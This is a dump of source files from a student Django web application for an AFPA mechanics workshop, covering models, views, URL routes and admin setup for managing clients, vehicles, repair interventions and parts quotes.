"blob_id": "9b3f16d183556d54494bf89fec5a4760f8d0aed8",
"content_id": "d9a080a25e16fdd4539f7709c70bdb5a88815cbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1636,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 62,
"path": "/garage/admin.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import *\nfrom .models import Utilisateur\nfrom django.contrib.auth.admin import UserAdmin as BaseUserAdmin\nfrom django.contrib.auth.models import User\n\n# Register your models here.\n\nclass UtilisateurInline(admin.StackedInline):\n model = Utilisateur\n can_delete = False\n verbose_name_plural = 'Utilisateurs'\n\nclass UserAdmin(BaseUserAdmin):\n inlines = (UtilisateurInline, )\n\nclass ClientInline(admin.TabularInline):\n model = Client\n can_delete = False\n\nclass DonneesPersonnellesAdmin(admin.ModelAdmin):\n inlines = (ClientInline, )\n\nclass ZipCodeInline(admin.TabularInline): \n model = City.zip_codes.through\n verbose_name = \"Code Postal\"\n verbose_name_plural = \"Codes Postaux\"\n \nclass ZipCodeAdmin(admin.ModelAdmin):\n exclude = (\"zipCode\", )\n inlines = (ZipCodeInline, )\n\nclass CityInline(admin.TabularInline):\n model = City.zip_codes.through\n verbose_name = \"Ville\"\n\nclass CityAdmin(admin.ModelAdmin):\n exclude = (\"zipCode\", )\n inlines = (CityInline, )\n\n\n# Register your models here.\nadmin.site.register(Address)\nadmin.site.register(ZipCode, ZipCodeAdmin)\nadmin.site.register(City, CityAdmin)\n\nadmin.site.unregister(User)\nadmin.site.register(User, UserAdmin)\n\nadmin.site.register(Vehicule)\nadmin.site.register(Motorise)\nadmin.site.register(Moto)\nadmin.site.register(Voiture)\nadmin.site.register(Velo)\n\n\nadmin.site.register(Intervention)\nadmin.site.register(Devis)\nadmin.site.register(Piece)\nadmin.site.register(Fournisseur)\nadmin.site.register(DonneesPersonnelles, DonneesPersonnellesAdmin)\nadmin.site.register(Piece_Fournisseur_Devis)"
},
{
"alpha_fraction": 0.709833025932312,
"alphanum_fraction": 0.709833025932312,
"avg_line_length": 58.88888931274414,
"blob_id": "418a122c73c69595974e1e3e7a82bead28db19ed",
"content_id": "6e27e487fc9be994ce68123f5f8fd5ca8ffecd88",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2695,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 45,
"path": "/garage/urls.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "from django.urls import path\n\nfrom django.views.generic import ListView\nfrom . import views\nfrom django.contrib.auth.views import LoginView, LogoutView\nfrom .models import Client\nfrom django.conf.urls import url, include\nfrom django.contrib.auth.decorators import login_required\n\n\napp_name = 'garage'\n\nurlpatterns = [ \n url(r'login', LoginView.as_view(redirect_authenticated_user=True, template_name=\"garage/login.html\"),\n name='login'),\n url(r'logout', LogoutView.as_view(template_name=\"garage/logout.html\"), name='logout'),\n \n url(r'^recherche/$', login_required(views.recherche), name='recherche'),\n path('accueil/', login_required(views.Accueil.as_view()), name='accueil'),\n\n path('client-create', login_required(views.ClientCreateView.as_view()), name='client-create'), \n path('client-select/', login_required(views.ClientSelect.as_view()), name=\"client-select\"),\n path('clients', login_required(views.Clients.as_view()), name=\"clients\"),\n path('client-update/<pk>/', login_required(views.ClientUpdate.as_view()), name='client-update'),\n\n path('velo-select/<int:client_id>/', login_required(views.VeloSelect.as_view()), name=\"velo-select\"),\n path('velo-create/<int:client_id>/', login_required(views.VeloCreate.as_view()), name='velo-create'),\n path('velos', login_required(views.VeloList.as_view()), name=\"velos\"),\n path('velo-update/<pk>/', login_required(views.VeloUpdate.as_view()), name='velo-update'),\n\n path('moto-select/<int:client_id>/', login_required(views.MotoSelect.as_view()), name=\"moto-select\"),\n path('moto-create/<int:client_id>/', login_required(views.MotoCreate.as_view()), name='moto-create'),\n path('motos', login_required(views.MotoList.as_view()), name=\"motos\"),\n path('moto-update/<pk>/', login_required(views.MotoUpdate.as_view()), name='moto-update'),\n\n path('voiture-select/<int:client_id>/', login_required(views.VehiculeSelect.as_view()), name=\"voiture-select\"),\n path('voiture-create/<int:client_id>/', login_required(views.VoitureCreate.as_view()), name='voiture-create'),\n path('voitures', login_required(views.VehiculeList.as_view()), name=\"voitures\"),\n path('nouveau-choix-vehicule', views.ChoixVehicule, name=\"choixVehicule\"),\n path('voiture-update/<pk>/', login_required(views.VoitureUpdate.as_view()), name='voiture-update'),\n\n path('intervention-create/<int:vehicule_id>/', login_required(views.InterventionCreate.as_view()), name='intervention-create'),\n path('interventions', login_required(views.Interventions.as_view()), name=\"interventions\"),\n path('intervention-update/<pk>/', login_required(views.InterventionUpdate.as_view()), name='intervention-update'),\n]\n"
},
{
"alpha_fraction": 0.6589841842651367,
"alphanum_fraction": 0.6656472086906433,
"avg_line_length": 37.141666412353516,
"blob_id": "5168b7f4f2d99ec3ede5dca2b5eba3ce223d6252",
"content_id": "d3bc2e908d2fc72a20fc14fc913da0b74d7c71fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9197,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 240,
"path": "/garage/models.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom datetime import datetime\nfrom django.contrib.auth.models import User\nfrom django.db import models \n \nclass ZipCode(models.Model):\n zip_code = models.CharField(max_length=15, verbose_name = 'Code Postal',)\n\n def __str__(self):\n return str( self.zip_code )\n class Meta:\n verbose_name = \"Code Postal\"\n verbose_name_plural = \"Codes Postaux\"\n\n\nclass City(models.Model):\n city_name = models.CharField(max_length =25, verbose_name = \"Ville\",)\n zip_codes = models.ManyToManyField(ZipCode, verbose_name=\"Code Postal\")\n\n def __str__(self):\n return str(self.city_name)\n class Meta:\n verbose_name = \"Ville\"\n verbose_name_plural = \"Villes\" \n \n\nclass Address(models.Model):\n street = models.TextField(max_length=50, blank=False, verbose_name = \"Nom de la rue\",)\n street_number = models.CharField(max_length = 30, null=True, blank = True, verbose_name = \"Numéro de la rue\",)\n street_complement = models.CharField(max_length =50, null=True, blank = True, verbose_name = \"Complément d'adresse\",)\n\n city = models.ForeignKey(City, on_delete=models.CASCADE, verbose_name = 'Ville')\n zipCode = models.ForeignKey(ZipCode, on_delete=models.CASCADE, verbose_name = 'Code Postal')\n \n class Meta:\n verbose_name = \"Adresse\"\n def __str__(self):\n return str(self.street_number) + \" \" + str(self.street) + \" \" + str(self.street_complement) + \" \" + str(self.zipCode) + \" \" + str(self.city)\n\n\nclass DonneesPersonnelles(models.Model):\n mail_client = models.EmailField(\"Email Client\", max_length=35, unique=True)\n telephone_client = models.CharField(\"Téléphone Client\", blank=False, max_length=10, null=True)\n carte_AFPA_img = models.ImageField(\"Carte AFPA\", null=True, blank=True, upload_to=\"img/carte_AFPA_client\")\n\n class Meta:\n verbose_name = \"Donnée Personnelle\"\n verbose_name_plural = \"Données Personnelles\"\n def __str__(self) :\n return \"Adresse mail : {0} Téléphone : {1}\".format(self.mail_client, self.telephone_client)\n \n\nclass Client(models.Model):\n nom_client = models.CharField(\"Nom Client\", max_length=15)\n prenom_client = models.CharField(\"Prenom Client\", max_length=15)\n numero_afpa_client = models.CharField(\"Numéro carte AFPA Client\", max_length=10, default=\"extérieur\")\n donnees_personnelles_client = models.OneToOneField(DonneesPersonnelles, on_delete=models.CASCADE)\n adresse = models.OneToOneField(Address, null=True, on_delete=models.CASCADE)\n\n def __str__(self):\n return \"{0} {1} N° AFPA : {2}\".format(self.nom_client, self.prenom_client, self.numero_afpa_client)\n\n\nclass Vehicule(models.Model): \n libelle_modele = models.CharField(\"libellé modèle\", blank=False, max_length=50)\n type_vehicule = models.CharField(\n max_length = 10,\n default=\"\"\n )\n client = models.ForeignKey(Client, null=True, on_delete=models.CASCADE)\n\n \n def is_upperclass(self):\n return self.type_vehicule in (self.MOTO, self.VOITURE)\n \n class Meta:\n #abstract = True\n verbose_name = \"Véhicule\"\n verbose_name_plural = \"Véhicules\"\n \n def __str__(self):\n return self.libelle_modele\n\n\nclass Motorise(Vehicule):\n libelle_marque = models.CharField(\"libellé marque\", max_length=100, null=True)\n vin = models.CharField(max_length=100, blank=False, null=True)\n immatriculation = models.CharField( max_length=15, blank=False, null=True)\n kilometrage = models.IntegerField(null=True, blank=True)\n date_mec = models.DateField(\"date de première m.e.c.\", null=True)\n carte_grise_img = models.ImageField(\"carte 
grise\", null=True, blank=False, upload_to=\"img/carte_grise\")\n carte_assurance_img = models.ImageField(\"carte assurance\", null=True, blank=False, upload_to=\"img/carte_assurance\")\n\n class Meta:\n #abstract = True\n verbose_name = \"Motorisé\"\n verbose_name_plural = \"Motorisés\"\n\n def __str__(self):\n return self.immatriculation + \" \" + self.libelle_modele + \" \" + self.libelle_marque\n\n\nclass Voiture(Motorise):\n def __str__(self):\n return Motorise.__str__(self) + \" \" + self.type_vehicule\n\n\nclass Moto(Motorise):\n def __str__(self):\n return Motorise.__str__(self) + \" \" + self.type_vehicule\n\n\nclass Velo(Vehicule):\n type_vehicule = \"Velo\"\n \n def __str__(self):\n return Vehicule.__str__(self) + \" \" + self.type_vehicule \n class Meta:\n verbose_name = \"Vélo\"\n verbose_name_plural = \"Vélos\"\n\n\nclass Utilisateur(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n date_entree_stage = models.DateField(null=True, blank=True)\n date_sortie_stage = models.DateField(null=True, blank=True)\n carte_afpa = models.CharField(\"Numéro carte AFPA\", max_length=10, blank=False, )\n \n def __str__(self):\n return \"Profil de {0}\".format(self.user.username)\n\n\nclass Intervention(models.Model):\n date_saisie_intervention = models.DateTimeField(\"date d'intervention\", null=True, blank=False, default=datetime.now )\n date_restitution_prevu = models.DateField(\"Date de restitution prévisionnelle\", null=True)\n diagnostic = models.TextField(max_length=300, null=True)\n intervention_a_realiser = models.TextField(\"interventions prévus\", max_length=300, null=True)\n intervention_realisee = models.BooleanField(\"intervention réalisée\", null=False, default=False)\n\n utilisateur = models.ForeignKey(User, on_delete=models.CASCADE)\n vehicule = models.ForeignKey(Vehicule, on_delete=models.CASCADE)\n \n ValidationFormateur = 'VF'\n AttenteFormateur = 'AF'\n RefusFormateur = 'RF'\n AttenteDevis = 'AD'\n \n Statut_choice = (\n (ValidationFormateur, 'ValidationFormateur'),\n (AttenteFormateur, 'AttenteFormateur'),\n (RefusFormateur, 'RefusFormateur'),\n (AttenteDevis, 'AttenteDevis'),\n )\n statut = models.CharField(\n max_length = 20,\n choices = Statut_choice,\n default = AttenteDevis,\n )\n\n def __str__(self):\n return str(self.vehicule) + \" \" + str(self.date_saisie_intervention) + \" \" + str(self.utilisateur) + \" \" + str(self.statut)\n\nclass Piece(models.Model):\n reference_piece = models.CharField(\"référence pièce\", blank=False, max_length=20)\n libelle_piece = models.CharField(\"libellé de la pièce\", blank=False, max_length=50)\n \n class Meta:\n verbose_name = \"Pièces\"\n verbose_name_plural = \"Pièces\"\n def __str__(self):\n return self.libelle_piece\n\n\nclass Fournisseur(models.Model):\n libelle_fournisseur = models.CharField(\"Nom Fournisseur\", blank=False, max_length=35)\n piece_fournisseur = models.ManyToManyField(Piece, through='Piece_Fournisseur_Devis')\n \n def __str__(self):\n return self.libelle_fournisseur\n\n\nclass Devis(models.Model):\n def NumeroDevis():\n num = Devis.objects.count()\n if num == None:\n return 1\n else:\n return num +1\n\n numero_devis = models.IntegerField(unique=True, default=NumeroDevis )\n date_devis = models.DateField(\"Date du devis\", blank=False, null=False)\n devis_signe_img = models.ImageField(\"Scan du devis signé\", null=True, blank=True, upload_to =\"img/devis\")\n \n ValidationFormateur = 'VF'\n AttenteFormateur = 'AF'\n RefusFormateur = 'RF'\n ValidationClient ='VC'\n AttenteClient = 
'AC'\n RefusClient = 'RC'\n \n Statut_choice = (\n (ValidationFormateur, 'ValidationFormateur'),\n (AttenteFormateur, 'AttenteFormateur'),\n (RefusFormateur, 'RefusFormateur'),\n (ValidationClient,'ValidationClient'),\n (AttenteClient, 'AttenteClient'),\n (RefusClient, 'RefusClient'),\n )\n statut = models.CharField(\n max_length = 20,\n choices = Statut_choice,\n default = AttenteFormateur,\n )\n\n#cléfs de relations\n commande_fournisseur = models.ManyToManyField(Fournisseur, through='Piece_Fournisseur_Devis')\n commande_piece = models.ManyToManyField(Piece, through='Piece_Fournisseur_Devis')\n intervention = models.ForeignKey(Intervention, on_delete=models.CASCADE)\n\n class Meta():\n verbose_name_plural = \"Devis\"\n def __str__(self):\n return str(self.numero_devis)\n\n\nclass Piece_Fournisseur_Devis(models.Model):\n quantite_pieces_necessaires = models.IntegerField(\"Quantité de pièces nécessaires\", blank=False, null=True, default=1)\n prix_ht = models.IntegerField(\"Prix Hors Taxes\", null=True, blank=False)\n numero_devis_fournisseur = models.CharField(\"Numéro du devis fournisseur\", max_length=20, null=True, blank=False)\n \n#cléfs de relations\n devis = models.ForeignKey(Devis, null=True, on_delete=models.CASCADE)\n fournisseur = models.ForeignKey(Fournisseur, null=True, on_delete=models.CASCADE)\n piece = models.ForeignKey(Piece, null=True, on_delete=models.CASCADE)\n\n class Meta():\n verbose_name = \"Commande\"\n verbose_name_plural = \"Commandes\"\n def __str__(self):\n return str(self.fournisseur) + \" devis n°\" +str(self.devis) + \" pièce : \" + str(self.piece)\n\n"
},
{
"alpha_fraction": 0.7956204414367676,
"alphanum_fraction": 0.7956204414367676,
"avg_line_length": 33,
"blob_id": "002ab0f697c7e43af697c3f66d51c47db8a993aa",
"content_id": "59b2d19273b6a2cc41045b0dd4c9f8ef948c5b8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 139,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 4,
"path": "/README.md",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "# afpa_meca\nProjet application web Pôle mécanique AFPA\nPre-requis : pip install Pillow sur l'environnement Django \npseudo Gaetan : Gama\n\n"
},
{
"alpha_fraction": 0.5762310028076172,
"alphanum_fraction": 0.578551173210144,
"avg_line_length": 38.338741302490234,
"blob_id": "135b9b0acbd629b811d98839173de27f4ed1d988",
"content_id": "2311a6033254af6003f96cc7abed5365799648db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19414,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 493,
"path": "/garage/views.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\nfrom .models import *\nfrom django.views.generic import TemplateView\nfrom django.shortcuts import render, get_object_or_404, redirect, reverse\nfrom .forms import *\nfrom django.views.generic import CreateView, UpdateView, ListView, View, FormView, DetailView\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse_lazy\nfrom . import urls\n\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.contrib.auth import logout\nfrom django.db import DatabaseError, transaction\nfrom django.core.exceptions import ValidationError\n\n\ndef accueil(request):\n return render(request, 'garage/accueil.html')\nclass Accueil(TemplateView):\n template_name = 'garage/accueil.html'\n\n def get_context_data(self, **kwargs):\n context = super(Accueil, self).get_context_data(**kwargs)\n context['liste_interventions'] = Intervention.objects.filter(utilisateur=self.request.user)\n return context\n\n\nclass ClientCreateView(View):\n def getForm(self, request):\n zipCode_form = ZipCodeForm(request.POST or None)\n city_form = CityForm(request.POST or None)\n address_form = AddressForm(request.POST or None) \n client_form = ClientForm(request.POST or None) \n donneesPersonnelles_form = DonneesPersonnellesForm(request.POST or None)\n\n return { 'client_form': client_form,\n 'donneesPersonnelles_form': donneesPersonnelles_form,\n 'address_form' : address_form,\n 'city_form' : city_form,\n 'zipCode_form' : zipCode_form\n }\n \n def get(self, request):\n myTemplate_name = 'garage/client_form.html'\n return render(request, myTemplate_name, self.getForm( request ) )\n\n @transaction.atomic\n def post(self, request):\n try:\n modelFormError = \"\"\n with transaction.atomic():\n dico = self.getForm( request )\n \n zipCode_form = dico['zipCode_form']\n if not zipCode_form.is_valid():\n modelFormError = \"Une erreur interne est apparue sur le code postal. Merci de recommencer votre saisie.\" \n raise ValidationError(modelFormError)\n else :\n try:\n zip_code = zipCode_form.cleaned_data['zip_code']\n codepostal = ZipCode.objects.filter(zip_code=zip_code)\n if not codepostal.exists():\n zipCode = zipCode_form.save() \n else :\n zipCode = codepostal[0]\n\n except DatabaseError: \n modelFormError = \"Problème de connection à la base de données\" \n raise \n\n city_form = dico['city_form']\n if not city_form.is_valid():\n modelFormError = \"Une erreur interne est apparue sur la ville. Merci de recommencer votre saisie.\" \n raise ValidationError(modelFormError)\n else :\n try:\n city_name = city_form.cleaned_data['city_name'] \n ville = City.objects.filter(city_name=city_name)\n if not ville.exists():\n city = city_form.save() \n else :\n city = ville[0]\n\n city.zip_codes.add(zipCode)\n city.save()\n\n except DatabaseError: \n modelFormError = \"Problème de connection à la base de données\" \n raise \n\n address_form = dico['address_form'] \n if not address_form.is_valid(): \n modelFormError = \"Une erreur interne est apparue sur l'adresse. 
Merci de recommencer votre saisie.\" \n raise ValidationError(modelFormError)\n else :\n try:\n address = address_form.save(commit=False)\n address.zipCode = zipCode\n address.city = city\n address.save()\n\n except DatabaseError: \n modelFormError = \"Problème de connection à la base de données\" \n raise \n\n\n donneesPersonnelles_form = dico['donneesPersonnelles_form'] \n if not donneesPersonnelles_form.is_valid():\n modelFormError = \"Une erreur interne est apparue sur les données personnelles. Merci de recommencer votre saisie.\" \n raise ValidationError(modelFormError)\n else :\n donnees = donneesPersonnelles_form.save() \n\n\n client_form = dico['client_form'] \n if not client_form.is_valid():\n modelFormError = \"Une erreur interne est apparue sur les données clients. Merci de recommencer votre saisie.\" \n raise ValidationError(modelFormError)\n else :\n try:\n client = client_form.save(commit=False)\n client.donnees_personnelles_client = donnees\n client.adresse = address\n client.save() \n context = {'client_id':client.id}\n\n except DatabaseError: \n modelFormError = \"Problème de connection à la base de données\" \n raise \n \n return redirect(\"garage:voiture-create\", context['client_id'])\n\n except (ValidationError, DatabaseError):\n dicoError = self.getForm( request )\n dicoError ['internal_error'] = modelFormError\n return render(request, 'garage/client_form.html', dicoError )\n \n return render(request, 'garage/client_form.html', self.getForm( request ) )\n\nclass ClientUpdate(UpdateView):\n template_name = 'garage/client_update.html'\n success_message = \"Données mises à jour avec succès\"\n\n def get(self, request, *args, **kwargs):\n client = Client.objects.get(pk=self.kwargs['pk'])\n address = client.adresse\n zipCode = address.zipCode\n city = address.city\n donneesPersonnelles = client.donnees_personnelles_client\n form = ZipCodeForm(instance=zipCode)\n form2 = CityForm(instance=city)\n form3 = AddressUpdateForm(instance=address)\n form4 = DonneesPersonnellesUpdateForm(instance=donneesPersonnelles)\n form5 = ClientForm(instance=client)\n\n context = {'form': form, 'form2': form2, 'form3': form3, 'form4': form4, 'form5': form5, }\n return render(request, self.template_name, context)\n\n def post (self, request, *args, **kwargs):\n client = Client.objects.get(pk=self.kwargs['pk'])\n address = client.adresse\n zipCode = address.zipCode\n city = address.city\n donneesPersonnelles = client.donnees_personnelles_client\n\n form = ZipCodeForm(request.POST, instance=zipCode)\n form2 = CityForm(request.POST, instance=city)\n form3 = AddressUpdateForm(request.POST, instance=address)\n form4 = DonneesPersonnellesUpdateForm(request.POST, instance=donneesPersonnelles)\n form5 = ClientForm(request.POST, instance=client)\n\n if form.is_valid() and form2.is_valid() and form3.is_valid() and form4.is_valid() and form5.is_valid(): \n zipCodeData = form.save(commit=False) \n cityData = form2.save(commit=False)\n addressData = form3.save(commit=False)\n donneesPersosData = form4.save(commit=False)\n clientData = form5.save(commit=False)\n \n cityData.save()\n addressData.city = cityData\n\n zipCodeData.save()\n addressData.zipCode = zipCodeData\n\n addressData.save()\n clientData.adresse = addressData\n\n donneesPersosData.save()\n clientData.donnees_personnelles_client = donneesPersosData\n\n clientData.save()\n return redirect('garage:clients')\n context = {'form': form, 'form2': form2, 'form3': form3, 'form4': form4, 'form5': form5, }\n return render(request, self.template_name, 
context)\n\n def get_context_data(self, **kwargs):\n\n client = Client.objects.filter(pk=self.kwargs['pk'])\n address = client.adresse\n zipCode = address.zipCode\n city = address.city\n donneesPersonnelles = client.donnees_personnelles_client\n context = super(ClientUpdate, self).get_context_data(**kwargs)\n if 'form' not in context:\n context['form'] = self.form_class(instance=zipCode)\n if 'form2' not in context:\n context['form2'] = self.second_form(instance=city)\n if 'form3' not in context:\n context['form3'] = self.third_form(instance=address)\n if 'form4' not in context:\n context['form4'] = self.fourth_form(instance=donneesPersonnelles)\n if 'form5' not in context:\n context['form5'] = self.fifth_form(instance=client)\n return context \n\nclass ClientSelect(ListView):\n model = Client\n template_name = \"garage/client-select.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_client'] = self.get_queryset()\n return context\n\nclass Clients(ClientSelect):\n template_name = \"garage/clients.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\n\nclass VoitureCreate(CreateView):\n form_class = VoitureForm\n template_name = 'garage/voiture_form.html'\n\n def get_success_url(self, **kwargs):\n\n return reverse_lazy('garage:intervention-create',\n kwargs={'vehicule_id': self.object.id},\n current_app='garage')\n\n def form_valid(self, form):\n client = Client.objects.get(pk=self.kwargs['client_id'])\n voiture = form.save()\n voiture.client = client\n voiture.save()\n voiture.type_vehicule = \"Voiture\"\n voiture.save()\n return super().form_valid(form)\n\n\nclass MotoCreate(CreateView):\n form_class = MotoForm\n template_name = 'garage/moto_form.html'\n\n def get_success_url(self, **kwargs):\n return reverse_lazy('garage:intervention-create',\n kwargs={'vehicule_id': self.object.id},\n current_app='garage')\n\n def form_valid(self, form):\n client = Client.objects.get(pk=self.kwargs['client_id'])\n moto = form.save()\n moto.type_vehicule = \"Moto\"\n moto.client = client\n moto.save()\n return super().form_valid(form)\n\nclass VeloCreate(CreateView):\n form_class = VeloForm\n template_name = 'garage/velo_form.html'\n\n def get_success_url(self, **kwargs):\n return reverse_lazy('garage:intervention-create',\n kwargs={'vehicule_id': self.object.id},\n current_app='garage')\n\n def form_valid(self, form):\n client = Client.objects.get(pk=self.kwargs['client_id'])\n velo = form.save()\n velo.type_vehicule = \"Velo\"\n velo.client = client\n velo.save()\n return super().form_valid(form)\n\n\nclass VoitureUpdate(UpdateView):\n model = Voiture\n template_name = 'garage/voiture_update.html'\n form_class = VoitureForm\n success_url = reverse_lazy('garage:voitures')\n\n def my_url(self):\n pass\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_interventions'] = Intervention.objects.filter(vehicule=self.kwargs['pk'])\n return context\n\nclass MotoUpdate(UpdateView):\n model = Moto\n template_name = 'garage/moto_update.html'\n form_class = MotoForm\n success_url = reverse_lazy('garage:voitures')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_interventions'] = Intervention.objects.filter(vehicule=self.kwargs['pk'])\n return context\n\nclass VeloUpdate(UpdateView):\n model = Velo\n template_name = 'garage/velo_update.html'\n form_class = VeloForm\n success_url = 
reverse_lazy('garage:velos')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_interventions'] = Intervention.objects.filter(vehicule=self.kwargs['pk'])\n return context\n\n\nclass VehiculeSelect(ListView):\n model = Voiture\n template_name = 'garage/voiture-select.html'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_vehicule'] = self.get_queryset()\n context['voiture_id'] = None\n context['curent_model'] = \"Voiture\"\n if self.template_name == 'garage/voiture-select.html':\n client = Client.objects.get(pk=self.kwargs['client_id'])\n context['client'] = client\n return context\n \n def get_queryset(self):\n return Voiture.objects.filter(client_id=self.kwargs['client_id'])\n\nclass MotoSelect(VehiculeSelect):\n model = Moto\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_vehicule'] = self.get_queryset()\n context['curent_model'] = \"Moto\"\n return context\n\n def get_queryset(self):\n return Moto.objects.filter(client_id=self.kwargs['client_id'])\n\nclass VeloSelect(VehiculeSelect):\n model = Velo\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_vehicule'] = self.get_queryset()\n context['curent_model'] = \"Velo\"\n return context\n\n def get_queryset(self):\n return Velo.objects.filter(client_id=self.kwargs['client_id'])\n\n\nclass VehiculeList(VehiculeSelect):\n template_name = 'garage/vehicules.html'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['curent_model'] = \"Voiture\"\n return context\n \n def get_queryset(self):\n return Voiture.objects.all()\n\nclass MotoList(VehiculeSelect):\n template_name = 'garage/vehicules.html'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['curent_model'] = \"Moto\"\n return context\n \n def get_queryset(self):\n return Moto.objects.all()\n\nclass VeloList(VehiculeSelect):\n template_name = 'garage/vehicules.html'\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['curent_model'] = \"Velo\"\n return context\n \n def get_queryset(self):\n return Velo.objects.all()\n\n\nclass InterventionCreate(CreateView):\n form_class = InterventionForm\n template_name = 'garage/ordre_reparation.html' \n def get_success_url(self, **kwargs):\n\n return reverse_lazy('garage:accueil',\n current_app='garage')\n\n def form_valid(self, form):\n if Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == \"Voiture\":\n vehicule = Voiture.objects.get(pk=self.kwargs['vehicule_id'])\n\n elif Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == \"Moto\":\n vehicule = Moto.objects.get(pk=self.kwargs['vehicule_id'])\n\n elif Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == \"Velo\":\n vehicule = Velo.objects.get(pk=self.kwargs['vehicule_id'])\n \n user = self.request.user\n\n intervention = form.save(commit=False)\n intervention.utilisateur = user\n intervention.vehicule = vehicule\n\n intervention.save()\n return super().form_valid(form)\n \n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n if Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == \"Voiture\":\n vehicule = Voiture.objects.get(pk=self.kwargs['vehicule_id'])\n\n elif Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == 
\"Moto\":\n vehicule = Moto.objects.get(pk=self.kwargs['vehicule_id'])\n\n elif Vehicule.objects.get(pk=self.kwargs['vehicule_id']).type_vehicule == \"Velo\":\n vehicule = Velo.objects.get(pk=self.kwargs['vehicule_id'])\n \n context['vehicule'] = vehicule \n return context\n\nclass InterventionSelect(ListView):\n model = Intervention\n template_name = \"garage/intervention-select.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['liste_interventions'] = self.get_queryset()\n return context\n\nclass Interventions(InterventionSelect):\n template_name = \"garage/interventions.html\"\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n return context\n\nclass InterventionUpdate(UpdateView):\n model = Intervention\n form_class = InterventionForm\n template_name = 'garage/ordre_reparation.html' \n success_url = reverse_lazy('garage:interventions')\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n intervention = Intervention.objects.get(pk=self.kwargs['pk'])\n if intervention.vehicule.type_vehicule == \"Voiture\":\n vehicule = Voiture.objects.get(pk=intervention.vehicule)\n\n elif intervention.vehicule.type_vehicule == \"Moto\":\n vehicule = Moto.objects.get(pk=intervention.vehicule)\n\n elif intervention.vehicule.type_vehicule == \"Velo\":\n vehicule = Velo.objects.get(pk=intervention.vehicule)\n\n context['vehicule'] = vehicule \n return context \n\ndef recherche(request):\n query = request.GET.get('query')\n if not query:\n clients = Client.objects.all()\n else:\n # nom_client contains the query is and query is not sensitive to case.\n clients = Client.objects.filter(nom_client__icontains=query)\n title = \"Résultats pour la requête %s\"%query\n context = {\n 'context_object_name': clients\n }\n return render(request, 'garage/recherche.html', context) \n \ndef ChoixVehicule(request):\n pass\n\n"
},
{
"alpha_fraction": 0.5941901206970215,
"alphanum_fraction": 0.5941901206970215,
"avg_line_length": 40.45255661010742,
"blob_id": "c3c8449479c620cc7f3efb9e412ac9bd7dc3d890",
"content_id": "a7046e98a82921e6ee58bb1d82341bc89046ec1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5690,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 137,
"path": "/garage/forms.py",
"repo_name": "bffred/afpa_meca",
"src_encoding": "UTF-8",
"text": "from django import forms\nfrom django.forms import ModelForm, TextInput, EmailInput, SelectDateWidget, FileInput, NumberInput, DateInput, Textarea\nfrom django.forms.utils import ErrorList\nfrom .models import *\n\nclass ClientForm(forms.ModelForm):\n class Meta:\n model = Client\n # fields = '__all__'\n fields = [\"nom_client\", \"prenom_client\", \"numero_afpa_client\"]\n widgets = {\n 'nom_client': TextInput(attrs={'class': 'form-control'}),\n 'prenom_client': TextInput(attrs={'class': 'form-control'}),\n 'numero_afpa_client': NumberInput(attrs={'class': 'form-control'})\n }\n\nclass DonneesPersonnellesUpdateForm(forms.ModelForm):\n class Meta:\n model = DonneesPersonnelles\n fields = [\"mail_client\", \"telephone_client\",\"carte_AFPA_img\"]\n widgets = {\n 'mail_client': TextInput(attrs={'class': 'form-control'}),\n 'telephone_client': TextInput(attrs={'class': 'form-control'}),\n 'carte_AFPA_img': FileInput(attrs={'class': 'form-control'})\n } \n\nclass DonneesPersonnellesForm(forms.ModelForm):\n class Meta:\n model = DonneesPersonnelles\n fields = [\"mail_client\", \"telephone_client\",\"carte_AFPA_img\"]\n widgets = {\n 'mail_client': 